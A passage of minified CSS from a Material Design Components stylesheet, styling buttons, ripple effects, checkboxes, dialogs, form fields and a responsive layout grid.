16px}.mdc-button--raised:disabled,.mdc-button--unelevated:disabled{background-color:rgba(0,0,0,.12);color:rgba(0,0,0,.37)}.mdc-button--raised:not(:disabled),.mdc-button--unelevated:not(:disabled){background-color:#3c7251}@supports not (-ms-ime-align: auto){.mdc-button--raised:not(:disabled),.mdc-button--unelevated:not(:disabled){background-color:var(--mdc-theme-primary, #3c7251)}}.mdc-button--raised:not(:disabled),.mdc-button--unelevated:not(:disabled){color:#fff;color:var(--mdc-theme-on-primary, #fff)}.mdc-button--raised{box-shadow:0px 3px 1px -2px rgba(0, 0, 0, 0.2),0px 2px 2px 0px rgba(0, 0, 0, 0.14),0px 1px 5px 0px rgba(0,0,0,.12);transition:box-shadow 280ms cubic-bezier(0.4, 0, 0.2, 1)}.mdc-button--raised:hover,.mdc-button--raised:focus{box-shadow:0px 2px 4px -1px rgba(0, 0, 0, 0.2),0px 4px 5px 0px rgba(0, 0, 0, 0.14),0px 1px 10px 0px rgba(0,0,0,.12)}.mdc-button--raised:active{box-shadow:0px 5px 5px -3px rgba(0, 0, 0, 0.2),0px 8px 10px 1px rgba(0, 0, 0, 0.14),0px 3px 14px 2px rgba(0,0,0,.12)}.mdc-button--raised:disabled{box-shadow:0px 0px 0px 0px rgba(0, 0, 0, 0.2),0px 0px 0px 0px rgba(0, 0, 0, 0.14),0px 0px 0px 0px rgba(0,0,0,.12)}.mdc-button--outlined{border-style:solid;padding:0 15px 0 15px;border-width:1px}.mdc-button--outlined:disabled{border-color:rgba(0,0,0,.37)}.mdc-button--outlined:not(:disabled){border-color:#3c7251;border-color:var(--mdc-theme-primary, #3c7251)}.mdc-button--dense{height:32px;font-size:.8125rem}@keyframes mdc-ripple-fg-radius-in{from{animation-timing-function:cubic-bezier(0.4, 0, 0.2, 1);transform:translate(var(--mdc-ripple-fg-translate-start, 0)) scale(1)}to{transform:translate(var(--mdc-ripple-fg-translate-end, 0)) scale(var(--mdc-ripple-fg-scale, 1))}}@keyframes mdc-ripple-fg-opacity-in{from{animation-timing-function:linear;opacity:0}to{opacity:var(--mdc-ripple-fg-opacity, 0)}}@keyframes mdc-ripple-fg-opacity-out{from{animation-timing-function:linear;opacity:var(--mdc-ripple-fg-opacity, 0)}to{opacity:0}}.mdc-ripple-surface--test-edge-var-bug{--mdc-ripple-surface-test-edge-var: 1px solid #000;visibility:hidden}.mdc-ripple-surface--test-edge-var-bug::before{border:var(--mdc-ripple-surface-test-edge-var)}.mdc-button{--mdc-ripple-fg-size: 0;--mdc-ripple-left: 0;--mdc-ripple-top: 0;--mdc-ripple-fg-scale: 1;--mdc-ripple-fg-translate-end: 0;--mdc-ripple-fg-translate-start: 0;-webkit-tap-highlight-color:rgba(0,0,0,0)}.mdc-button::before,.mdc-button::after{position:absolute;border-radius:50%;opacity:0;pointer-events:none;content:""}.mdc-button::before{transition:opacity 15ms linear,background-color 15ms linear;z-index:1}.mdc-button.mdc-ripple-upgraded::before{transform:scale(var(--mdc-ripple-fg-scale, 1))}.mdc-button.mdc-ripple-upgraded::after{top:0;left:0;transform:scale(0);transform-origin:center center}.mdc-button.mdc-ripple-upgraded--unbounded::after{top:var(--mdc-ripple-top, 0);left:var(--mdc-ripple-left, 0)}.mdc-button.mdc-ripple-upgraded--foreground-activation::after{animation:mdc-ripple-fg-radius-in 225ms forwards,mdc-ripple-fg-opacity-in 75ms forwards}.mdc-button.mdc-ripple-upgraded--foreground-deactivation::after{animation:mdc-ripple-fg-opacity-out 150ms;transform:translate(var(--mdc-ripple-fg-translate-end, 0)) scale(var(--mdc-ripple-fg-scale, 1))}.mdc-button::before,.mdc-button::after{top:calc(50% - 100%);left:calc(50% - 100%);width:200%;height:200%}.mdc-button.mdc-ripple-upgraded::after{width:var(--mdc-ripple-fg-size, 100%);height:var(--mdc-ripple-fg-size, 100%)}.mdc-button::before,.mdc-button::after{background-color:#3c7251}@supports not (-ms-ime-align: auto){.mdc-button::before,.mdc-button::after{background-color:var(--mdc-theme-primary, #3c7251)}}.mdc-button:hover::before{opacity:.04}.mdc-button:not(.mdc-ripple-upgraded):focus::before,.mdc-button.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.mdc-button:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.mdc-button:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.mdc-button.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.mdc-button--raised::before,.mdc-button--raised::after,.mdc-button--unelevated::before,.mdc-button--unelevated::after{background-color:#fff}@supports not (-ms-ime-align: auto){.mdc-button--raised::before,.mdc-button--raised::after,.mdc-button--unelevated::before,.mdc-button--unelevated::after{background-color:var(--mdc-theme-on-primary, #fff)}}.mdc-button--raised:hover::before,.mdc-button--unelevated:hover::before{opacity:.08}.mdc-button--raised:not(.mdc-ripple-upgraded):focus::before,.mdc-button--raised.mdc-ripple-upgraded--background-focused::before,.mdc-button--unelevated:not(.mdc-ripple-upgraded):focus::before,.mdc-button--unelevated.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.24}.mdc-button--raised:not(.mdc-ripple-upgraded)::after,.mdc-button--unelevated:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.mdc-button--raised:not(.mdc-ripple-upgraded):active::after,.mdc-button--unelevated:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.24}.mdc-button--raised.mdc-ripple-upgraded,.mdc-button--unelevated.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.24}@keyframes mdc-checkbox-unchecked-checked-checkmark-path{0%,50%{stroke-dashoffset:29.7833385}50%{animation-timing-function:cubic-bezier(0, 0, 0.2, 1)}100%{stroke-dashoffset:0}}@keyframes mdc-checkbox-unchecked-indeterminate-mixedmark{0%,68.2%{transform:scaleX(0)}68.2%{animation-timing-function:cubic-bezier(0, 0, 0, 1)}100%{transform:scaleX(1)}}@keyframes mdc-checkbox-checked-unchecked-checkmark-path{from{animation-timing-function:cubic-bezier(0.4, 0, 1, 1);opacity:1;stroke-dashoffset:0}to{opacity:0;stroke-dashoffset:-29.7833385}}@keyframes mdc-checkbox-checked-indeterminate-checkmark{from{animation-timing-function:cubic-bezier(0, 0, 0.2, 1);transform:rotate(0deg);opacity:1}to{transform:rotate(45deg);opacity:0}}@keyframes mdc-checkbox-indeterminate-checked-checkmark{from{animation-timing-function:cubic-bezier(0.14, 0, 0, 1);transform:rotate(45deg);opacity:0}to{transform:rotate(360deg);opacity:1}}@keyframes mdc-checkbox-checked-indeterminate-mixedmark{from{animation-timing-function:mdc-animation-deceleration-curve-timing-function;transform:rotate(-45deg);opacity:0}to{transform:rotate(0deg);opacity:1}}@keyframes mdc-checkbox-indeterminate-checked-mixedmark{from{animation-timing-function:cubic-bezier(0.14, 0, 0, 1);transform:rotate(0deg);opacity:1}to{transform:rotate(315deg);opacity:0}}@keyframes mdc-checkbox-indeterminate-unchecked-mixedmark{0%{animation-timing-function:linear;transform:scaleX(1);opacity:1}32.8%,100%{transform:scaleX(0);opacity:0}}.mdc-checkbox{display:inline-block;position:relative;flex:0 0 18px;box-sizing:content-box;width:18px;height:18px;padding:11px;line-height:0;white-space:nowrap;cursor:pointer;vertical-align:bottom}.mdc-checkbox__native-control:enabled:not(:checked):not(:indeterminate)~.mdc-checkbox__background{border-color:rgba(0,0,0,.54);background-color:transparent}.mdc-checkbox__native-control:enabled:checked~.mdc-checkbox__background,.mdc-checkbox__native-control:enabled:indeterminate~.mdc-checkbox__background{border-color:#446199;border-color:var(--mdc-theme-secondary, #446199);background-color:#446199;background-color:var(--mdc-theme-secondary, #446199)}@keyframes mdc-checkbox-fade-in-background-0{0%{border-color:rgba(0,0,0,.54);background-color:transparent}50%{border-color:#446199;border-color:var(--mdc-theme-secondary, #446199);background-color:#446199;background-color:var(--mdc-theme-secondary, #446199)}}@keyframes mdc-checkbox-fade-out-background-0{0%,80%{border-color:#446199;border-color:var(--mdc-theme-secondary, #446199);background-color:#446199;background-color:var(--mdc-theme-secondary, #446199)}100%{border-color:rgba(0,0,0,.54);background-color:transparent}}.mdc-checkbox--anim-unchecked-checked .mdc-checkbox__native-control:enabled~.mdc-checkbox__background,.mdc-checkbox--anim-unchecked-indeterminate .mdc-checkbox__native-control:enabled~.mdc-checkbox__background{animation-name:mdc-checkbox-fade-in-background-0}.mdc-checkbox--anim-checked-unchecked .mdc-checkbox__native-control:enabled~.mdc-checkbox__background,.mdc-checkbox--anim-indeterminate-unchecked .mdc-checkbox__native-control:enabled~.mdc-checkbox__background{animation-name:mdc-checkbox-fade-out-background-0}.mdc-checkbox__checkmark{color:#fff}.mdc-checkbox__mixedmark{border-color:#fff}.mdc-checkbox__background::before{background-color:#446199}@supports not (-ms-ime-align: auto){.mdc-checkbox__background::before{background-color:var(--mdc-theme-secondary, #446199)}}.mdc-checkbox__native-control[disabled]:not(:checked):not(:indeterminate)~.mdc-checkbox__background{border-color:rgba(0,0,0,.26)}.mdc-checkbox__native-control[disabled]:checked~.mdc-checkbox__background,.mdc-checkbox__native-control[disabled]:indeterminate~.mdc-checkbox__background{border-color:transparent;background-color:rgba(0,0,0,.26)}@media screen and (-ms-high-contrast: active){.mdc-checkbox__mixedmark{margin:0 1px}}.mdc-checkbox--disabled{cursor:default;pointer-events:none}.mdc-checkbox__background{left:11px;right:initial;display:inline-flex;position:absolute;top:11px;bottom:0;align-items:center;justify-content:center;box-sizing:border-box;width:45%;height:45%;border:2px solid currentColor;border-radius:2px;background-color:transparent;pointer-events:none;will-change:background-color,border-color;transition:background-color 90ms 0ms cubic-bezier(0.4, 0, 0.6, 1),border-color 90ms 0ms cubic-bezier(0.4, 0, 0.6, 1)}.mdc-checkbox[dir=rtl] .mdc-checkbox__background,[dir=rtl] .mdc-checkbox .mdc-checkbox__background{left:initial;right:11px}.mdc-checkbox__checkmark{position:absolute;top:0;right:0;bottom:0;left:0;width:100%;opacity:0;transition:opacity 180ms 0ms cubic-bezier(0.4, 0, 0.6, 1)}.mdc-checkbox--upgraded .mdc-checkbox__checkmark{opacity:1}.mdc-checkbox__checkmark-path{transition:stroke-dashoffset 180ms 0ms cubic-bezier(0.4, 0, 0.6, 1);stroke:currentColor;stroke-width:3.12px;stroke-dashoffset:29.7833385;stroke-dasharray:29.7833385}.mdc-checkbox__mixedmark{width:100%;height:0;transform:scaleX(0) rotate(0deg);border-width:1px;border-style:solid;opacity:0;transition:opacity 90ms 0ms cubic-bezier(0.4, 0, 0.6, 1),transform 90ms 0ms cubic-bezier(0.4, 0, 0.6, 1)}.mdc-checkbox--upgraded .mdc-checkbox__background,.mdc-checkbox--upgraded .mdc-checkbox__checkmark,.mdc-checkbox--upgraded .mdc-checkbox__checkmark-path,.mdc-checkbox--upgraded .mdc-checkbox__mixedmark{transition:none !important}.mdc-checkbox--anim-unchecked-checked .mdc-checkbox__background,.mdc-checkbox--anim-unchecked-indeterminate .mdc-checkbox__background,.mdc-checkbox--anim-checked-unchecked .mdc-checkbox__background,.mdc-checkbox--anim-indeterminate-unchecked .mdc-checkbox__background{animation-duration:180ms;animation-timing-function:linear}.mdc-checkbox--anim-unchecked-checked .mdc-checkbox__checkmark-path{animation:mdc-checkbox-unchecked-checked-checkmark-path 180ms linear 0s;transition:none}.mdc-checkbox--anim-unchecked-indeterminate .mdc-checkbox__mixedmark{animation:mdc-checkbox-unchecked-indeterminate-mixedmark 90ms linear 0s;transition:none}.mdc-checkbox--anim-checked-unchecked .mdc-checkbox__checkmark-path{animation:mdc-checkbox-checked-unchecked-checkmark-path 90ms linear 0s;transition:none}.mdc-checkbox--anim-checked-indeterminate .mdc-checkbox__checkmark{animation:mdc-checkbox-checked-indeterminate-checkmark 90ms linear 0s;transition:none}.mdc-checkbox--anim-checked-indeterminate .mdc-checkbox__mixedmark{animation:mdc-checkbox-checked-indeterminate-mixedmark 90ms linear 0s;transition:none}.mdc-checkbox--anim-indeterminate-checked .mdc-checkbox__checkmark{animation:mdc-checkbox-indeterminate-checked-checkmark 500ms linear 0s;transition:none}.mdc-checkbox--anim-indeterminate-checked .mdc-checkbox__mixedmark{animation:mdc-checkbox-indeterminate-checked-mixedmark 500ms linear 0s;transition:none}.mdc-checkbox--anim-indeterminate-unchecked .mdc-checkbox__mixedmark{animation:mdc-checkbox-indeterminate-unchecked-mixedmark 300ms linear 0s;transition:none}.mdc-checkbox__native-control:checked~.mdc-checkbox__background,.mdc-checkbox__native-control:indeterminate~.mdc-checkbox__background{transition:border-color 90ms 0ms cubic-bezier(0, 0, 0.2, 1),background-color 90ms 0ms cubic-bezier(0, 0, 0.2, 1)}.mdc-checkbox__native-control:checked~.mdc-checkbox__background .mdc-checkbox__checkmark-path,.mdc-checkbox__native-control:indeterminate~.mdc-checkbox__background .mdc-checkbox__checkmark-path{stroke-dashoffset:0}.mdc-checkbox__background::before{position:absolute;top:0;right:0;bottom:0;left:0;width:100%;height:100%;transform:scale(0, 0);border-radius:50%;opacity:0;pointer-events:none;content:"";will-change:opacity,transform;transition:opacity 90ms 0ms cubic-bezier(0.4, 0, 0.6, 1),transform 90ms 0ms cubic-bezier(0.4, 0, 0.6, 1)}.mdc-checkbox__native-control:focus~.mdc-checkbox__background::before{transform:scale(2.75, 2.75);opacity:.12;transition:opacity 80ms 0ms cubic-bezier(0, 0, 0.2, 1),transform 80ms 0ms cubic-bezier(0, 0, 0.2, 1)}.mdc-checkbox__native-control{position:absolute;top:0;left:0;width:100%;height:100%;margin:0;padding:0;opacity:0;cursor:inherit}.mdc-checkbox__native-control:disabled{cursor:default;pointer-events:none}.mdc-checkbox__native-control:checked~.mdc-checkbox__background .mdc-checkbox__checkmark{transition:opacity 180ms 0ms cubic-bezier(0, 0, 0.2, 1),transform 180ms 0ms cubic-bezier(0, 0, 0.2, 1);opacity:1}.mdc-checkbox__native-control:checked~.mdc-checkbox__background .mdc-checkbox__mixedmark{transform:scaleX(1) rotate(-45deg)}.mdc-checkbox__native-control:indeterminate~.mdc-checkbox__background .mdc-checkbox__checkmark{transform:rotate(45deg);opacity:0;transition:opacity 90ms 0ms cubic-bezier(0.4, 0, 0.6, 1),transform 90ms 0ms cubic-bezier(0.4, 0, 0.6, 1)}.mdc-checkbox__native-control:indeterminate~.mdc-checkbox__background .mdc-checkbox__mixedmark{transform:scaleX(1) rotate(0deg);opacity:1}.mdc-checkbox{--mdc-ripple-fg-size: 0;--mdc-ripple-left: 0;--mdc-ripple-top: 0;--mdc-ripple-fg-scale: 1;--mdc-ripple-fg-translate-end: 0;--mdc-ripple-fg-translate-start: 0;-webkit-tap-highlight-color:rgba(0,0,0,0)}.mdc-checkbox::before,.mdc-checkbox::after{position:absolute;border-radius:50%;opacity:0;pointer-events:none;content:""}.mdc-checkbox::before{transition:opacity 15ms linear,background-color 15ms linear;z-index:1}.mdc-checkbox.mdc-ripple-upgraded::before{transform:scale(var(--mdc-ripple-fg-scale, 1))}.mdc-checkbox.mdc-ripple-upgraded::after{top:0;left:0;transform:scale(0);transform-origin:center center}.mdc-checkbox.mdc-ripple-upgraded--unbounded::after{top:var(--mdc-ripple-top, 0);left:var(--mdc-ripple-left, 0)}.mdc-checkbox.mdc-ripple-upgraded--foreground-activation::after{animation:mdc-ripple-fg-radius-in 225ms forwards,mdc-ripple-fg-opacity-in 75ms forwards}.mdc-checkbox.mdc-ripple-upgraded--foreground-deactivation::after{animation:mdc-ripple-fg-opacity-out 150ms;transform:translate(var(--mdc-ripple-fg-translate-end, 0)) scale(var(--mdc-ripple-fg-scale, 1))}.mdc-checkbox::before,.mdc-checkbox::after{background-color:#446199}@supports not (-ms-ime-align: auto){.mdc-checkbox::before,.mdc-checkbox::after{background-color:var(--mdc-theme-secondary, #446199)}}.mdc-checkbox:hover::before{opacity:.04}.mdc-checkbox:not(.mdc-ripple-upgraded):focus::before,.mdc-checkbox.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.mdc-checkbox:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.mdc-checkbox:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.mdc-checkbox.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.mdc-checkbox::before,.mdc-checkbox::after{top:calc(50% - 50%);left:calc(50% - 50%);width:100%;height:100%}.mdc-checkbox.mdc-ripple-upgraded::before,.mdc-checkbox.mdc-ripple-upgraded::after{top:var(--mdc-ripple-top, calc(50% - 50%));left:var(--mdc-ripple-left, calc(50% - 50%));width:var(--mdc-ripple-fg-size, 100%);height:var(--mdc-ripple-fg-size, 100%)}.mdc-checkbox.mdc-ripple-upgraded::after{width:var(--mdc-ripple-fg-size, 100%);height:var(--mdc-ripple-fg-size, 100%)}.mdc-ripple-upgraded--background-focused .mdc-checkbox__background::before{content:none}.mdc-dialog,.mdc-dialog__scrim{position:fixed;top:0;left:0;align-items:center;justify-content:center;box-sizing:border-box;width:100%;height:100%}.mdc-dialog{display:none;z-index:7}.mdc-dialog .mdc-dialog__surface{background-color:#fff;background-color:var(--mdc-theme-surface, #fff)}.mdc-dialog .mdc-dialog__scrim{background-color:rgba(0,0,0,.32)}.mdc-dialog .mdc-dialog__title{color:rgba(0,0,0,.87)}.mdc-dialog .mdc-dialog__content{color:rgba(0,0,0,.6)}.mdc-dialog.mdc-dialog--scrollable .mdc-dialog__title,.mdc-dialog.mdc-dialog--scrollable .mdc-dialog__actions{border-color:rgba(0,0,0,.12)}.mdc-dialog .mdc-dialog__surface{min-width:280px}@media(max-width: 592px){.mdc-dialog .mdc-dialog__surface{max-width:calc(100vw - 32px)}}@media(min-width: 592px){.mdc-dialog .mdc-dialog__surface{max-width:560px}}.mdc-dialog .mdc-dialog__surface{max-height:calc(100vh - 32px)}.mdc-dialog .mdc-dialog__surface{border-radius:4px}.mdc-dialog__scrim{opacity:0;z-index:-1}.mdc-dialog__container{display:flex;flex-direction:row;justify-content:space-around;box-sizing:border-box;transform:scale(0.8);opacity:0}.mdc-dialog__surface{box-shadow:0px 11px 15px -7px rgba(0, 0, 0, 0.2),0px 24px 38px 3px rgba(0, 0, 0, 0.14),0px 9px 46px 8px rgba(0,0,0,.12);display:flex;flex-direction:column;flex-grow:0;flex-shrink:0;box-sizing:border-box;max-width:100%;max-height:100%}.mdc-dialog[dir=rtl] .mdc-dialog__surface,[dir=rtl] .mdc-dialog .mdc-dialog__surface{text-align:right}.mdc-dialog__title{display:block;margin-top:0;line-height:normal;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;font-size:1.25rem;line-height:2rem;font-weight:500;letter-spacing:.0125em;text-decoration:inherit;text-transform:inherit;display:block;position:relative;flex-shrink:0;box-sizing:border-box;margin:0;padding:0 24px 9px;border-bottom:1px solid transparent}.mdc-dialog__title::before{display:inline-block;width:0;height:40px;content:"";vertical-align:0}.mdc-dialog[dir=rtl] .mdc-dialog__title,[dir=rtl] .mdc-dialog .mdc-dialog__title{text-align:right}.mdc-dialog--scrollable .mdc-dialog__title{padding-bottom:15px}.mdc-dialog__content{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;font-size:1rem;line-height:1.5rem;font-weight:400;letter-spacing:.03125em;text-decoration:inherit;text-transform:inherit;flex-grow:1;box-sizing:border-box;margin:0;padding:20px 24px;overflow:auto;-webkit-overflow-scrolling:touch}.mdc-dialog__content>:first-child{margin-top:0}.mdc-dialog__content>:last-child{margin-bottom:0}.mdc-dialog__title+.mdc-dialog__content{padding-top:0}.mdc-dialog--scrollable .mdc-dialog__content{padding-top:8px;padding-bottom:8px}.mdc-dialog__content .mdc-list:first-child:last-child{padding:6px 0 0}.mdc-dialog--scrollable .mdc-dialog__content .mdc-list:first-child:last-child{padding:0}.mdc-dialog__actions{display:flex;position:relative;flex-shrink:0;flex-wrap:wrap;align-items:center;justify-content:flex-end;box-sizing:border-box;min-height:52px;margin:0;padding:8px;border-top:1px solid transparent}.mdc-dialog--stacked .mdc-dialog__actions{flex-direction:column;align-items:flex-end}.mdc-dialog__button{margin-left:8px;margin-right:0;max-width:100%;text-align:right}[dir=rtl] .mdc-dialog__button,.mdc-dialog__button[dir=rtl]{margin-left:0;margin-right:8px}.mdc-dialog__button:first-child{margin-left:0;margin-right:0}[dir=rtl] .mdc-dialog__button:first-child,.mdc-dialog__button:first-child[dir=rtl]{margin-left:0;margin-right:0}.mdc-dialog[dir=rtl] .mdc-dialog__button,[dir=rtl] .mdc-dialog .mdc-dialog__button{text-align:left}.mdc-dialog--stacked .mdc-dialog__button:not(:first-child){margin-top:12px}.mdc-dialog--open,.mdc-dialog--opening,.mdc-dialog--closing{display:flex}.mdc-dialog--opening .mdc-dialog__scrim{transition:opacity 150ms linear}.mdc-dialog--opening .mdc-dialog__container{transition:opacity 75ms linear,transform 150ms 0ms cubic-bezier(0, 0, 0.2, 1)}.mdc-dialog--closing .mdc-dialog__scrim,.mdc-dialog--closing .mdc-dialog__container{transition:opacity 75ms linear}.mdc-dialog--closing .mdc-dialog__container{transform:scale(1)}.mdc-dialog--open .mdc-dialog__scrim{opacity:1}.mdc-dialog--open .mdc-dialog__container{transform:scale(1);opacity:1}.mdc-dialog-scroll-lock{overflow:hidden}.mdc-form-field{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;font-size:.875rem;line-height:1.25rem;font-weight:400;letter-spacing:.0178571429em;text-decoration:inherit;text-transform:inherit;color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-background, rgba(0, 0, 0, 0.87));display:inline-flex;align-items:center;vertical-align:middle}.mdc-form-field>label{order:0;margin-right:auto;padding-left:4px}[dir=rtl] .mdc-form-field>label,.mdc-form-field[dir=rtl]>label{margin-left:auto;padding-right:4px}.mdc-form-field--align-end>label{order:-1;margin-left:auto;padding-right:4px}[dir=rtl] .mdc-form-field--align-end>label,.mdc-form-field--align-end[dir=rtl]>label{margin-right:auto;padding-left:4px}:root{--mdc-layout-grid-margin-desktop: 24px;--mdc-layout-grid-gutter-desktop: 24px;--mdc-layout-grid-column-width-desktop: 72px;--mdc-layout-grid-margin-tablet: 16px;--mdc-layout-grid-gutter-tablet: 16px;--mdc-layout-grid-column-width-tablet: 72px;--mdc-layout-grid-margin-phone: 16px;--mdc-layout-grid-gutter-phone: 16px;--mdc-layout-grid-column-width-phone: 72px}@media(min-width: 961px){.mdc-layout-grid{box-sizing:border-box;margin:0 auto;padding:24px;padding:var(--mdc-layout-grid-margin-desktop, 24px)}}@media(min-width: 601px)and (max-width: 960px){.mdc-layout-grid{box-sizing:border-box;margin:0 auto;padding:16px;padding:var(--mdc-layout-grid-margin-tablet, 16px)}}@media(max-width: 600px){.mdc-layout-grid{box-sizing:border-box;margin:0 auto;padding:16px;padding:var(--mdc-layout-grid-margin-phone, 16px)}}@media(min-width: 961px){.mdc-layout-grid__inner{display:flex;flex-flow:row wrap;align-items:stretch;margin:-12px;margin:calc(var(--mdc-layout-grid-gutter-desktop, 24px) / 2 * -1)}@supports(display: grid){.mdc-layout-grid__inner{display:grid;margin:0;grid-gap:24px;grid-gap:var(--mdc-layout-grid-gutter-desktop, 24px);grid-template-columns:repeat(12, minmax(0, 1fr))}}}@media(min-width: 601px)and (max-width: 960px){.mdc-layout-grid__inner{display:flex;flex-flow:row wrap;align-items:stretch;margin:-8px;margin:calc(var(--mdc-layout-grid-gutter-tablet, 16px) / 2 * -1)}@supports(display: grid){.mdc-layout-grid__inner{display:grid;margin:0;grid-gap:16px;grid-gap:var(--mdc-layout-grid-gutter-tablet, 16px);grid-template-columns:repeat(8, minmax(0, 1fr))}}}@media(max-width: 600px){.mdc-layout-grid__inner{display:flex;flex-flow:row wrap;align-items:stretch;margin:-8px;margin:calc(var(--mdc-layout-grid-gutter-phone, 16px) / 2 * -1)}@supports(display: grid){.mdc-layout-grid__inner{display:grid;margin:0;grid-gap:16px;grid-gap:var(--mdc-layout-grid-gutter-phone, 16px);grid-template-columns:repeat(4, minmax(0, 1fr))}}}@media(min-width: 961px){.mdc-layout-grid__cell{width:calc(33.3333333333% - 24px);width:calc(33.3333333333% - var(--mdc-layout-grid-gutter-desktop, 24px));box-sizing:border-box;margin:12px;margin:calc(var(--mdc-layout-grid-gutter-desktop, 24px) / 2)}@supports(display: grid){.mdc-layout-grid__cell{width:auto;grid-column-end:span 4}}@supports(display: grid){.mdc-layout-grid__cell{margin:0}}.mdc-layout-grid__cell--span-1,.mdc-layout-grid__cell--span-1-desktop{width:calc(8.3333333333% - 24px);width:calc(8.3333333333% - var(--mdc-layout-grid-gutter-desktop, 24px))}@supports(display: grid){.mdc-layout-grid__cell--span-1,.mdc-layout-grid__cell--span-1-desktop{width:auto;grid-column-end:span 1}}.mdc-layout-grid__cell--span-2,.mdc-layout-grid__cell--span-2-desktop{width:calc(16.6666666667% - 24px);width:calc(16.6666666667% - var(--mdc-layout-grid-gutter-desktop, 24px))}@supports(display: grid){.mdc-layout-grid__cell--span-2,.mdc-layout-grid__cell--span-2-desktop{width:auto;grid-column-end:span 2}}.mdc-layout-grid__cell--span-3,.mdc-layout-grid__cell--span-3-desktop{width:calc(25% - 24px);width:calc(25% - var(--mdc-layout-grid-gutter-desktop, 24px))}@supports(display: grid){.mdc-layout-grid__cell--span-3,.mdc-layout-grid__cell--span-3-desktop{width:auto;grid-column-end:span 3}}.mdc-layout-grid__cell--span-4,.mdc-layout-grid__cell--span-4-desktop{width:calc(33.3333333333% - 24px);width:calc(33.3333333333% - var(--mdc-layout-grid-gutter-desktop, 24px))}@supports(display: grid){.mdc-layout-grid__cell--span-4,.mdc-layout-grid__cell--span-4-desktop{width:auto;grid-column-end:span 4}}.mdc-layout-grid__cell--span-5,.mdc-layout-grid__cell--span-5-desktop{width:calc(41.6666666667% - 24px);width:calc(41.6666666667% - var(--mdc-layout-grid-gutter-desktop, 24px))}@supports(display: grid){.mdc-layout-grid__cell--span-5,.mdc-layout-grid__cell--span-5-desktop{width:auto;grid-column-end:span 5}}.mdc-layout-grid__cell--span-6,.mdc-layout-grid__cell--span-6-desktop{width:calc(50% - 24px);width:calc(50% - var(--mdc-layout-grid-gutter-desktop, 24px))}@supports(display: grid){.mdc-layout-grid__cell--span-6,.mdc-layout-grid__cell--span-6-desktop{width:auto;grid-column-end:span 6}}.mdc-layout-grid__cell--span-7,.mdc-layout-grid__cell--span-7-desktop{width:calc(58.3333333333% - 24px);width:calc(58.3333333333% - var(--mdc-layout-grid-gutter-desktop, 24px))}@supports(display: grid){.mdc-layout-grid__cell--span-7,.mdc-layout-grid__cell--span-7-desktop{width:auto;grid-column-end:span 7}}.mdc-layout-grid__cell--span-8,.mdc-layout-grid__cell--span-8-desktop{width:calc(66.6666666667% - 24px);width:calc(66.6666666667% - var(--mdc-layout-grid-gutter-desktop, 24px))}@supports(display: grid){.mdc-layout-grid__cell--span-8,.mdc-layout-grid__cell--span-8-desktop{width:auto;grid-column-end:span 8}}.mdc-layout-grid__cell--span-9,.mdc-layout-grid__cell--span-9-desktop{width:calc(75% - 24px);width:calc(75% - var(--mdc-layout-grid-gutter-desktop, 24px))}@supports(display: grid){.mdc-layout-grid__cell--span-9,.mdc-layout-grid__cell--span-9-desktop{width:auto;grid-column-end:span 9}}.mdc-layout-grid__cell--span-10,.mdc-layout-grid__cell--span-10-desktop{width:calc(83.3333333333% - 24px);width:calc(83.3333333333% - var(--mdc-layout-grid-gutter-desktop, 24px))}@supports(display: grid){.mdc-layout-grid__cell--span-10,.mdc-layout-grid__cell--span-10-desktop{width:auto;grid-column-end:span 10}}.mdc-layout-grid__cell--span-11,.mdc-layout-grid__cell--span-11-desktop{width:calc(91.6666666667% - 24px);width:calc(91.6666666667% - var(--mdc-layout-grid-gutter-desktop, 24px))}@supports(display: grid){.mdc-layout-grid__cell--span-11,.mdc-layout-grid__cell--span-11-desktop{width:auto;grid-column-end:span 11}}.mdc-layout-grid__cell--span-12,.mdc-layout-grid__cell--span-12-desktop{width:calc(100% - 24px);width:calc(100% - var(--mdc-layout-grid-gutter-desktop, 24px))}@supports(display: grid){.mdc-layout-grid__cell--span-12,.mdc-layout-grid__cell--span-12-desktop{width:auto;grid-column-end:span 12}}}@media(min-width: 601px)and (max-width: 960px){.mdc-layout-grid__cell{width:calc(50% - 16px);width:calc(50% - var(--mdc-layout-grid-gutter-tablet, 16px));box-sizing:border-box;margin:8px;margin:calc(var(--mdc-layout-grid-gutter-tablet, 16px) / 2)}@supports(display: grid){.mdc-layout-grid__cell{width:auto;grid-column-end:span 4}}@supports(display: grid){.mdc-layout-grid__cell{margin:0}}.mdc-layout-grid__cell--span-1,.mdc-layout-grid__cell--span-1-tablet{width:calc(12.5% - 16px);width:calc(12.5% - var(--mdc-layout-grid-gutter-tablet, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-1,.mdc-layout-grid__cell--span-1-tablet{width:auto;grid-column-end:span 1}}.mdc-layout-grid__cell--span-2,.mdc-layout-grid__cell--span-2-tablet{width:calc(25% - 16px);width:calc(25% - var(--mdc-layout-grid-gutter-tablet, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-2,.mdc-layout-grid__cell--span-2-tablet{width:auto;grid-column-end:span 2}}.mdc-layout-grid__cell--span-3,.mdc-layout-grid__cell--span-3-tablet{width:calc(37.5% - 16px);width:calc(37.5% - var(--mdc-layout-grid-gutter-tablet, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-3,.mdc-layout-grid__cell--span-3-tablet{width:auto;grid-column-end:span 